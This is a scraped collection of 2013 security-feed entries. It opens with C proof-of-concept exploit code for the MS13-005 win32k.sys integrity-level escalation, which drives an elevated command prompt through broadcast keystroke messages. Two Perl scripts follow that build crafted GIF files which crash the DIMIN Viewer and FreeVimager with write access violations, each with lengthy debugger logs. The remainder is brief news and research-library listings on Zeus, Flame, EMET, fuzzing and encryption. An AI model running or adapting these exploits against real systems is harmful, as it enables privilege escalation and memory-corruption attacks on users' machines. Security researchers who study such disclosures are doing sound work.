http://rss.feedsportal.com/c/32479/f/477548/index.rss MS13-005 (win32k.sys) The vulnerability could allow elevation of privilege if an attacker runs a specially crafted application. This security update is rated Important for all supported editions of Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, and Windows RT. For more information, see the subsection, Affected and Non-Affected Software, in this section. include <windows.h> #include <stdio.h> int main() { nbsp; STARTUPINFO si = {0}; nbsp; PROCESS_INFORMATION pi = {0}; nbsp; PCHAR payload[] = { nbsp; "echo \"._ ___ __________ __________ \"> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \"| | / \\ \\__ _/ | \\_ ___/ \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \"|_\\__|__ / |__| \\_|_ /___ / \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \" ___ ._ ______ ____ _ \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \" \\ \\ | |/ _/ / _/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \" / | \\| / \\ _/ \\ _ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \"\\__| /_|\\____ /\\__ /\\__| / \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL", nbsp; "exit", nbsp; NULL nbsp; }; nbsp; printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n"); nbsp; getchar(); nbsp; si.cb = sizeof(si); nbsp; CreateProcess( nbsp; NULL, nbsp; "cmd.exe", nbsp; NULL, nbsp; NULL, nbsp; TRUE, nbsp; CREATE_NEW_CONSOLE, nbsp; NULL, nbsp; NULL, nbsp; &si, nbsp; &pi nbsp; ); nbsp; Sleep(1000); nbsp; // Yeah, you can "bruteforce" the index of the window.. nbsp; printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI.."); nbsp; keybd_event(VK_LWIN, 0x5B, 0, 0); nbsp; keybd_event(VK_LSHIFT, 0xAA, 0, 0); nbsp; keybd_event(0x37, 0x87, 0, 0); nbsp; keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0); nbsp; keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0); nbsp; keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0); nbsp; Sleep(1000); nbsp; printf("3] Killing now the useless low IL cmd.exe..\n"); nbsp; TerminateProcess( nbsp; pi.hProcess, nbsp; 1337 nbsp; ); nbsp; nbsp; printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n"); nbsp; printf(" \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n"); nbsp; for(unsigned int i = 0; payload[i] != NULL; ++i) nbsp; { nbsp; for(unsigned int j = 0; j < strlen(payload[i]); ++j) nbsp; { nbsp; // Yeah, that's the fun part to watch ;D nbsp; Sleep(10); nbsp; SendMessage( nbsp; HWND_BROADCAST, nbsp; WM_CHAR, nbsp; payload[i][j], nbsp; 0 nbsp; ); nbsp; } nbsp; SendMessage( nbsp; HWND_BROADCAST, nbsp; WM_CHAR, nbsp; VK_RETURN, nbsp; 0 nbsp; ); nbsp; } nbsp; return EXIT_SUCCESS; } http://dualcoremusic.com/nerdcore/music/ Tags: exploit, poc, win32k.sys, windows GPS STUxFF *>*:: Russia, Moscow {{{Mind Wave}}}[#sudo]:: working Mp3z:[$whoami]#-:: Dual Core - Here to Help (ft Remington Forbes)

==> DIMIN Viewer 5.4.0 DoS PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/perl # DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira <pereira@secbiz.de> # Vendor URI: http://www.dimin.net # Vendor Decription: # View images in countless formats, and apply a variety of effects with this small, fast, and powerful # application. Dimin Viewer incorporates unique visualization ideas, like Panoramic Photographs Tool # and Big Image Navigator. It also features multi language interface to feel yourself at home! # Debug info: # Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 # Copyright (c) Microsoft Corporation. All rights reserved. # # CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" C:\research\Viewer5\crafted.gif # Symbol search path is: * Invalid * # ************************************************************************ # * Symbol loading may be unreliable without a symbol search path. * # * Use .symfix to have the debugger choose a symbol path. * # * After setting your symbol path, use .reload to refresh symbol locations. * # ************************************************************************ # Executable search path is: # ModLoad: 00400000 006bb000 image00400000 # ModLoad: 7c900000 7c9b2000 ntdll.dll # ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll # ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\advapi32.dll # ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll # ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll # ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll # ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll # ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll # ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll # ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll # ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll # ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll # ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll # ModLoad: 77120000 771ab000 C:\WINDOWS\system32\oleaut32.dll # ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll # ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\winmm.dll # ModLoad: 73000000 73026000 C:\WINDOWS\system32\winspool.drv # (fdc.b98): Break instruction exception - code 80000003 (first chance) # ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL # ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll # ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll # ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime # ModLoad: 00e50000 00ef7000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_dcraw.dll # ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll # ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll # ModLoad: 00f20000 0102f000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll # ModLoad: 01050000 0106a000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_morphology.dll # ModLoad: 01090000 010ba000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_xtdFilters.dll # (fdc.b98): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0 # eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 # *** WARNING: Unable to verify checksum for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll - # div5_xtd_formats!divGetFilter+0x80c8b: # 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???????????????????????????????? # 0:000> r;!exploitable -v;q # eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0 # eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 # div5_xtd_formats!divGetFilter+0x80c8b: # 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???????????????????????????????? # HostMachine\HostUser # Executing Processor Architecture is x86 # Debuggee is in User Mode # Debuggee is a live user mode debugging session on the local machine # Event Type: Exception # *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - # Exception Faulting Address: 0x1471000 # First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) # Exception Sub-Type: Write Access Violation # # Exception Hash (Major/Minor): 0x550b2f71.0x55423571 # # Stack Trace: # div5_xtd_formats!divGetFilter+0x80c8b # div5_xtd_formats!divGetFilter+0x80d0a # div5_xtd_formats+0xc821 # div5_xtd_formats+0xcc07 # Instruction Address: 0x0000000000fb1a7b # # # Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 # Copyright (c) Microsoft Corporation. All rights reserved. # # CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" C:\research\Viewer5\crafted.gif # Symbol search path is: * Invalid * # ************************************************************************ # * Symbol loading may be unreliable without a symbol search path. * # * Use .symfix to have the debugger choose a symbol path. * # * After setting your symbol path, use .reload to refresh symbol locations. * # ************************************************************************ # Executable search path is: # ModLoad: 00400000 006bb000 image00400000 # ModLoad: 7c900000 7c9b2000 ntdll.dll # ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll # ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\advapi32.dll # ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll # ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll # ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll # ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll # ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll # ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll # ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll # ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll # ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll # ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll # ModLoad: 77120000 771ab000 C:\WINDOWS\system32\oleaut32.dll # ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll # ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\winmm.dll # ModLoad: 73000000 73026000 C:\WINDOWS\system32\winspool.drv # (fdc.b98): Break instruction exception - code 80000003 (first chance) # ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL # ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll # ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll # ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime # ModLoad: 00e50000 00ef7000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_dcraw.dll # ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll # ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll # ModLoad: 00f20000 0102f000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll # ModLoad: 01050000 0106a000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_morphology.dll # ModLoad: 01090000 010ba000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_xtdFilters.dll # (fdc.b98): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0 # eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 # *** WARNING: Unable to verify checksum for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll - # div5_xtd_formats!divGetFilter+0x80c8b: # 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???????????????????????????????? # 0:000> r;!exploitable -v;q # eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0 # eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 # div5_xtd_formats!divGetFilter+0x80c8b: # 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=???????????????????????????????? # HostMachine\HostUser # Executing Processor Architecture is x86 # Debuggee is in User Mode # Debuggee is a live user mode debugging session on the local machine # Event Type: Exception # *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - # Exception Faulting Address: 0x1471000 # First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) # Exception Sub-Type: Write Access Violation # # Exception Hash (Major/Minor): 0x550b2f71.0x55423571 # # Stack Trace: # div5_xtd_formats!divGetFilter+0x80c8b # div5_xtd_formats!divGetFilter+0x80d0a # div5_xtd_formats+0xc821 # div5_xtd_formats+0xcc07 # Instruction Address: 0x0000000000fb1a7b # Proof of Concept: my $crafted = "\x47\x49\x46\x38\x39\x61\x30\x00\x2C\x00\xB3\x00\x00\x00\x00\x00". "\x80\x00\x00\x00\x80\x00\x80\x80\x00\x00\x00\x80\x80\x00\x80\x00". "\x80\x80\x80\x80\x80\xC0\xC0\xC0\xFF\x00\x00\x00\xFF\x00\xFF\xFF". "\x00\x00\x00\xFF\xFF\x00\xFF\x00\xFF\xFF\xFF\xFF\xFF\x21\xF9\x04". "\x01\x00\x00\x0F\x00\x2C\x00\x00\x00\x00\x30\x00\x2C\x00\x00\xFE". "\x04\xF0"; open(C, ">:raw", "crafted.gif"); print C $crafted; close(C);

==> FreeVimager 4.1.0 DoS PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/perl # FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira <pereira@secbiz.de> # Vendor URI: http://www.contaware.com # Vendor Decription: # This is a Free & Fast Image Viewer and Editor for Windows. It can as well play avi video files, # ordinary audio files and audio CDs. There are many tools around doing that, but the aim of this # Freeware is to be a small and handy tool doing what it says and running also as a standalone # exe file (installer not necessary). # Debug info: # Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 # Copyright (c) Microsoft Corporation. All rights reserved. # # CommandLine: "C:\Program Files\FreeVimager\FreeVimager.exe" C:\research\FreeVimager\crafted.gif # Symbol search path is: * Invalid * # ************************************************************************ # * Symbol loading may be unreliable without a symbol search path. * # * Use .symfix to have the debugger choose a symbol path. * # * After setting your symbol path, use .reload to refresh symbol locations. * # ************************************************************************ # Executable search path is: # ModLoad: 00400000 00c9a000 image00400000 # ModLoad: 7c900000 7c9b2000 ntdll.dll # ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll # ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll # ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll # ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll # ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll # ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll # ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll # ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\COMCTL32.dll # ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll # ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll # ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll # ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV # ModLoad: 7df70000 7df92000 C:\WINDOWS\system32\oledlg.dll # ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll # ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll # ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll # ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll # ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll # ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll # ModLoad: 3d930000 3da16000 C:\WINDOWS\system32\WININET.dll # ModLoad: 00340000 00349000 C:\WINDOWS\system32\Normaliz.dll # ModLoad: 78130000 78263000 C:\WINDOWS\system32\urlmon.dll # ModLoad: 3dfd0000 3e1bb000 C:\WINDOWS\system32\iertutil.dll # (e48.568): Break instruction exception - code 80000003 (first chance) # ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL # ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll # ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll # ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime # ModLoad: 76f50000 76f58000 C:\WINDOWS\system32\Wtsapi32.dll # ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll # ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll # ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.DLL # ModLoad: 76380000 76385000 C:\WINDOWS\system32\msimg32.dll # (e48.568): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080 # eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216 # *** WARNING: Unable to verify checksum for image00400000 # *** ERROR: Module load completed but symbols could not be loaded for image00400000 # image00400000+0x1c02c3: # 005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=???????? # 0:000> r;!exploitable -v;q # eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080 # eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216 # image00400000+0x1c02c3: # 005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=???????? # HostMachine\HostUser # Executing Processor Architecture is x86 # Debuggee is in User Mode # Debuggee is a live user mode debugging session on the local machine # Event Type: Exception # *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll - # Exception Faulting Address: 0x2151c154 # First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) # Exception Sub-Type: Write Access Violation # # Exception Hash (Major/Minor): 0x50747228.0x58333273 # # Stack Trace: # image00400000+0x1c02c3 # image00400000+0x1bfd07 # image00400000+0x18abb4 # kernel32!VirtualAllocEx+0x47 # kernel32!VirtualAlloc+0x18 # image00400000+0x18a0ef # image00400000+0x18a121 # image00400000+0x24fb01 # image00400000+0x24fc4e # image00400000+0x23be55 # image00400000+0x95a48 # image00400000+0x4fd8 # image00400000+0xf054e # image00400000+0xea85e # ntdll!RtlFreeHeap+0x130 # ntdll!RtlFreeHeap+0x130 # kernel32!CreateActCtxW+0xb6c # kernel32!CreateActCtxW+0xcbf # Instruction Address: 0x00000000005c02c3 # Proof of Concept: my $crafted = "\x47\x49\x46\x38\x39\x61\x18\x00\x18\x00\xC4\x00\x00\xA2\xC5". "\xE1\xEB\xF3\xF9\x8C\xB8\xDA\x49\x8E\xC3\x95\xBD\xDC\xFE\xFE". "\xFF\x75\xAA\xD3\x38\x84\xBE\xD5\xE5\xF1\x5D\x9A\xCA\x26\x78". "\xB8\x22\x76\xB7\xC4\xDA\xEC\xDD\xEA\xF4\x55\x96\xC8\xF4\xF8". "\xFC\x89\xB5\xD8\xF1\xF6\xFA\x28\x79\xB8\x87\xB5\xD8\x31\x7F". "\xBC\x23\x77\xB8\x9E\xC3\xE0\x9E\xC3\xDF\x68\xA1\xCE\xE6\xF0". "\xF7\xFA\xFC\xFD\x1F\x74\xB6\x8E\xB9\xDA\xFF\xFF\xFF\x1E\x73". "\xB5\x1E\x74\xB6\x21\xF9\x04\x00\x00\x00\x00\x00\x2C\x00\x00". "\x00\x00\x18\x00\x18\x00\x00\xFB\x05\x60"; my $junk = "\x90" x 163; open(C, ">:raw", "crafted.gif"); print C $crafted.$junk; close(C);

==> Microsoft attempts legal action to disrupt some Zeus botnets

http://rss.techtarget.com/981.xml Legal and technical actions could disrupt some Zeus botnet operations by seizing command-and-control servers in Pennsylvania and Illinois. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Flame Windows Update Attack Could Have Been Repeated in 3 Days, Says Microsoft

http://seclists.org/rss/isn.rss Posted by InfoSec News on Mar 03 http://www.wired.com/threatlevel/2013/03/flame-windows-update-copycat/ By Kim Zetter Threat Level Wired.com 03.01.13 When the sophisticated state-sponsored espionage tool known as Flame was exposed last year, there was probably no one more concerned about the discovery than Microsoft, after realizing that the tool was signed with an unauthorized Microsoft certificate to verify its trustworthiness to victim machines. The attackers also...

==> Microsoft Windows multiple security vulnerabilities, updated since 14.02.2013

http://securityvulns.com/informer/rss.asp?l=EN Quartz.dll memory corruption, .Net privilege escalation, multiple kernel race conditions, CSRSS privilege escalation, TCP/IP DoS. Applications: Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server (02.03.2013)

==> Secure Application Development

http://securosis.com/feeds/research Secure application development is about building secure software. Most security products offer band-aid protection for existing applications: they filter, block, or proxy communications to/from applications that are incapable of protecting themselves. We want to get away from this “Features first, security second” model and code applications that are self-reliant and can protect themselves. The secure code movement is in its infancy. There are different processes, training programs, and tools to aid the development of secure applications – which we will cover here. We will also reference some of the OWASP and Rugged Software projects. Papers and Posts ------------ * FireStarter: Agile Development and Security * Comments on Microsoft Simplified SDL * Rock Beats Scissors, and People Beat Process * FireStarter: Secure Development Lifecycle – You’re Doing It Wrong * Structured Security Program, Meet Agile Process * FireStarter: For Secure Code, Process Is a Placebo – It’s All about Peer Pressure * Are Secure Web Apps Possible? * Clickjacking Details, Analysis, and Advice Presentations --------- Security + Agile = FAIL Podcasts, Webcasts, and Multimedia
We do not currently have multimedia for this topic. Vendors --- We’ll include white and black box analysis, fuzzing, and tools vendors. This list is currently evolving, and we’ll include other firms as time permits. * Cigital * HP (SpiDynamics, Fortify) * IBM (Ounce) * Veracode * WhiteHat Security Subscribe to our daily email digest

==> Encryption

http://securosis.com/feeds/research Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on encryption is Understanding and Selecting a Database Encryption or Tokenization Solution. 2. Your Simple Guide to Endpoint Encryption. 3. Post on the Three Laws of Data Encryption. 4. Format and Datatype Preserving Encryption 5. Post on When to Layer Encryption. 6. Application vs. Database Encryption. 7. The post Database Media Protection focuses on threats to storage media, and some follow-up comments on Database Media Threats. 8. The Data Security Lifecycle covers encryption during the movement and storage of data. General Coverage ------------ 1. Tokenization Will Become the Dominant Payment Transaction Architecture 2. Visa’s Data Field Encryption 3. Boaz Nails It- The Encryption Dilemma 4. “PIN Crackers” and Data Security, looking at attacks on encryption. 5. Part of the core value of Data Centric Security is the ability to protect data regardless of where it moves or resides, which is facilitated by encryption. This is discussed in Part 1 and Part 2 of the Best Practices for Endpoint Security. 6. An editorial on how parts of the U.S. intelligence community discourage the adoption of encryption, as it is counterproductive to their mission. 7. This post discusses Digital Rights Management (DRM) as it pertains to Cloud Computing and content protection. Presentations --------- * Presentation on Data Breaches and Encryption. * Presentation on Data Protection in the Enterprise. This is a corporate overview. * This presentation is on Encrypting Mobile Data for the Enterprise. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). Being here does not imply any endorsement; this list is simply meant to assist you if should you should start looking for tools. Please email info@securosis.com if you have any additions or corrections.
Enterprise/General Encryption Providers * Certicom. * CheckPoint. * Entrust. * GuardianEdge. * IBM. * nuBridges. * Prime Factors Inc. * RSA. * SafeNet. * Sophos (Utimaco). * Symantec (PGP). * Thales (nCipher) * TruCrypt. * Venafi. * Voltage. * Vormetric. * WinMagic. Endpoint Encryption Vendors * beCrypt. * Credant. * DESLock. * McAfee (SafeBoot). * Microsoft (BitLocker). * Namo. * Secude. * Secuware. Database Encryption Vendors * IBM. * NetLib. * Oracle. * Relational Wizards. * RSA (Valyd). * SafeNet (Ingrian). * Sybase. * Thales (nCipher). * Voltage. * Vormetric. Key Management, Certificate and other tools * Entrust. * Prime Factors Inc. * RSA * Symantec (Verisign). * Thales Subscribe to our daily email digest

==> Cloud Computing Security

http://securosis.com/feeds/research This section of the research library is dedicated to all things Cloud. Mostly we will cover Cloud Security, but along with this week need to have some understanding of what ‘The Cloud’ actually is, and what the major variations look like. We will also cover SaaS and Virtualization under this space; not because they are ‘The Cloud’, but they involve a Cloud-like model in many cases. We will be adding a lot of content to this section in the coming weeks. Papers and Posts ------------ * Rich’s series defining a Cloud Security Data Lifecycle: Introduction, Create, Store, Use, Share, Archive and Delete. * Securing the Cloud with Virtual Private Storage. * How The Cloud Destroys Everything I Love about Web Application Security. Presentations --------- * Understanding Cloud Security in 30 Minutes or Less! Podcasts, Webcasts and Multimedia
Chris Hoff co-hosts the Network Security Podcast, and talks about the Microsoft/EM partnership, Liquid Machines and Information Centric Security. Oh, he mentions a few things on ‘The Cloud’ too. Subscribe to our daily email digest

==> local - Microsoft Windows XP Professionnel Service Pack 2 & 3 Insecure Library Load

http://www.1337day.com/rss

==> remote - MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free

http://www.1337day.com/rss

==> AMD video drivers prevent the use of the most secure setting for Microsoft's Exploit Mitigation Experience Toolkit (EMET)

http://www.cert.org/blogs/vuls/rss.xml Microsoft EMET is an effective way of preventing many vulnerabilities from being exploited; however, systems that use AMD or ATI video drivers do not support the feature that provides the highest amount of protection.

==> CERT Failure Observation Engine 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hello, this is David Warren from the CERT Vulnerability Analysis team. In May 2010, CERT released the Basic Fuzzing Framework, a Linux-based file fuzzer. We released BFF with the intent to increase awareness and adoption of automated, negative software testing. An often-requested feature is that BFF support the Microsoft Windows platform. To this end, we have worked to create a Windows analog to the BFF: the Failure Observation Engine (FOE). Through our internal testing, we've been able to help identify, coordinate, and fix exploitable vulnerabilities in Adobe, Microsoft, Google, Oracle, Autonomy, and Apple software, as well as many others. Our office shootout post is a good example of this testing.

==> Microsoft shows off big data, big-screen prototypes at research fair

http://www.hackinthebox.org/backend.php http://cdn-static.zdnet.com/i/r/story/70/00/012174/tfconnecting-620x115.png?hash=BJWuAzAxBG&upscale=1 Microsoft is showing off prototypes of some of the fruits of its research labs from around the world, many of which have big-data, machine-learning and natural-user-interface tie-ins. TechFest, the 2013 version of Microsoft's annual research and development showcase, kicked off this week on March 5. March 5 was the only day that TechFest is open to non-employees. A number of press, customers and partners had a chance to see a subset of the research projects that Microsoft will be highlighting throughout the week. Tags: MicrosoftHardware

==> Pwn2Own, Pwnium Attract Dollars and 0-Days by the Bushel

http://www.hackinthebox.org/backend.php http://cdn-static.zdnet.com/i/story/70/00/001316/pwn2ownmobile.jpeg The new year is barely two months old and it's already been a brutal one for the disclosure of new vulnerabilities. Java, Adobe Reader, Flash, Google Chrome and a number of other widely deployed applications have all been hit with a slew of serious bugs in just the last few weeks. And that's likely to get worse this week as researchers convene in Vancouver for the Pwn2Own and Pwnium hacking contests. Tags: CanSecPwn2OwnPwniumGoogleChromeMicrosoftIESecurityHackers

==> Microsoft might owe the Danish tax man $1bn

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Denmark Denmark wants Microsoft to pay $1 billion in back taxes in one of the biggest tax cases in the country's history, local media reported on Monday. The Danish tax authority is in negotiations with Microsoft over unpaid taxes stemming from the $1.88 billion takeover of Danish software company Navision in 2002, Danish Radio DR said, quoting unnamed sources. Tags: MicrosoftDenmarkLaw and Order

==> EU Fines Microsoft $732 Million In Browser Brawl

